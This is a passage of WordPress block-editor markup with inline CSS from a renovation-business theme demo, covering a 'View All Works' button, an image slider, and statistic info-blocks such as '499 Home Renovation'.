976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3\"} -->\n<style type=\"text/css\"> .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"0ee250e6-d2c0-4a54-855c-c9a5ea24a891\"} -->\n<style type=\"text/css\"> .block-id-0ee250e6-d2c0-4a54-855c-c9a5ea24a891 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-0ee250e6-d2c0-4a54-855c-c9a5ea24a891 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-0ee250e6-d2c0-4a54-855c-c9a5ea24a891 .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-0ee250e6-d2c0-4a54-855c-c9a5ea24a891 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"26c58722-09e8-4e24-8b58-31e2262a34b4\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-26c58722-09e8-4e24-8b58-31e2262a34b4 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-26c58722-09e8-4e24-8b58-31e2262a34b4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-26c58722-09e8-4e24-8b58-31e2262a34b4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-26c58722-09e8-4e24-8b58-31e2262a34b4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"1fd0b7b2-91d8-46d5-8f09-59f88b116616\"} -->\n<style type=\"text/css\"> .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"d5edc62b-d1c5-45f7-bab5-16740b0f6d87\"} -->\n<style type=\"text/css\"> .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"8de3594a-c7f7-4e6b-bb64-582b8fe3d309\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"4f102aee-ad93-49eb-af11-54a2955ce371\"} -->\n<style type=\"text/css\"> .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-4f102aee-ad93-49eb-af11-54a2955ce371\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"c1e01025-8987-4675-a6e5-4a3cf2941fd2\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-c1e01025-8987-4675-a6e5-4a3cf2941fd2 